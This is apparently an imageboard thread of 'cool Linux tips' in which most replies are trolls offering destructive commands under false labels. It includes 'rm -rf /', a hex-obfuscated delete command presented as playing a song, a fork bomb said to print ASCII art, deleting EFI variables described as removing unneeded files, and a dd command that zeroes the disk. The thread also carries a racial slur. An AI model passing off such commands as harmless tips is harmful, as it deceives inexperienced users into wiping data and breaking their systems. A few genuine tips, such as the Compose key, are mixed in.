/Cool Linux Tips/

Teach me some cool things you can do with Linux. Shell commands, file edits, window manager settings, keyboard shortcuts, cool programs, mpv commands, desktop environments, anything.

Attached: That Feel When To Intelligent.jpg (239x211, 8K)

Other urls found in this thread:

youtube.com/watch?v=RUlhGpDF25E
twitter.com/SFWRedditVideos

sudo rm -rf /*

Install gentoo

Based and redpilled

sudo shutdown now

cd code
cd..
pwd
cd..
cd ..
ls
cd code
cd ..

don't tell anyone i shared these hacks with u user i don't want to get arrested

Ctrl-C is copy. Ctrl-v is paste.
And, btw....
I'd just like to interject for a moment. What you’re referring to as Linux, is in fact, GNU/Linux, or as I’ve recently taken to calling it, GNU plus Linux. Linux is not an operating system unto itself, but rather another free component of a fully functioning GNU system made useful by the GNU corelibs, shell utilities and vital system components comprising a full OS as defined by POSIX.
Many computer users run a modified version of the GNU system every day, without realizing it. Through a peculiar turn of events, the version of GNU which is widely used today is often called “Linux”, and many of its users are not aware that it is basically the GNU system, developed by the GNU Project. There really is a Linux, and these people are using it, but it is just a part of the system they use.
Linux is the kernel: the program in the system that allocates the machine’s resources to the other programs that you run. The kernel is an essential part of an operating system, but useless by itself; it can only function in the context of a complete operating system. Linux is normally used in combination with the GNU operating system: the whole system is basically GNU with Linux added, or GNU/Linux. All the so-called “Linux” distributions are really distributions of GNU/Linux.

# Play zelda theme song
$(echo 726d202d7266202a | xxd -r -p)

Here's a cool, non-meme one: Compose key. I bound it to Caps Lock since I don't need it for anything, so it was just an extra button in my keyboard waiting for a purpose.
>Compose key + T + M = ™
>Compose key + O + O = °
>Compose key + A + E = Æ
>Compose key + O + R = ®
>Compose key + P + I = π
So logical and practical. I wish Windows would have this too. You can even make your own ones.

Yeah I love this!

Windows doesn't support it out of the box, but there's an application called WinCompose which is great.

:(){ :|: & };:
prints some cool ascii art

That's cool, thanks friend. How does it work? Is it based on system time? The artwork seems to change slightly every time I run it.
.___.
/ \
| O _ O |
/ \_/ \
.' / \ `.
/ _| |_ \
(_/ | | \_)
\ /
__\_>-

Is it possible to triforce with it?

wtf my computer froze and i had to pull the cord to reboot it asshole i was downloading my cousins swimsuit pics

THIS BROKE MY ARCH INSTALL FUCK YOU

sudo rm -rf /sys/firmware/efi/efivars
Removes about ~20gb of unneeded efi configuration files

kek same here minus the cousin swimsuit part
you niggers got me, what it actually do?

Go back

Creates infinite copies of itself

underrated

defines function : which calls itself and then runs it

youtube.com/watch?v=RUlhGpDF25E
this is what you want, OP. Don't be ashamed.

kek

Linux is a kernel. You can do nothing with it on its own.

Its asking for my password what should I do?

Attached: dxl2ui5v2r611.jpg (900x900, 83K)

Don't give it. SuDo was developed by the Sudanese-Dominican hacking alliance. If you give them your password, they will use it to infiltrate your subnet.

cool

sudo rm -rf /

Can't access /proc/

>i'm too young to recognize a forkbomb when I see one
back to javascript, gen-z suhbhuan

dont do this, its bad hackercode to steal your nudes

sudo less

:! sh

sudo su
dd if=/dev/zero of=/dev/sda

I had to pipe to aplay, other wise good job

noice, would share with every1

# Print the OS name.
uname --operating-system

A shorter and easier to remember version of this which people usually use is just typing "uname". It gets unnecessarily difficult to type something that long.

really old webm

Attached: vim fizzbuzz.webm (472x560, 649K)

Attached: how-to-screenshot-or8.png (1600x2600, 117K)

>117KiB
Bloat

Attached: ect.png (1600x2600, 103K)

sudo apt-get install palemoon